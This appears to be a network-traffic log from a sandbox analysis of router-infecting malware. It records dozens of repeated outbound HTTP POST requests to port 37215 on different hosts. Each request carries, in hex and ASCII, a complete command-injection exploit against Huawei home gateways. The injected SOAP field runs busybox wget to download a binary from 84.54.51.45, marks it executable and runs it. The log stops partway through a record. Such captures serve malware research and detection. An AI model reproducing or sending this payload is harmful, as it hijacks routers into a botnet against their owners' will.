2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1565192.168.2.154732841.154.73.19637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108598948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1566192.168.2.154086441.93.152.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108619928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1567192.168.2.153866241.136.173.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108619928 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1568192.168.2.153555841.50.61.20337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108623981 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1569192.168.2.154494841.127.255.15237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108628988 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1570192.168.2.153678041.131.80.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108674049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1571192.168.2.154490041.38.187.19037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108675957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1572192.168.2.154537241.88.255.1437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108695030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1573192.168.2.155979441.38.59.25037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108701944 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1574192.168.2.154457841.104.54.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108705997 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1575192.168.2.155791641.161.116.1737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:13.108768940 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
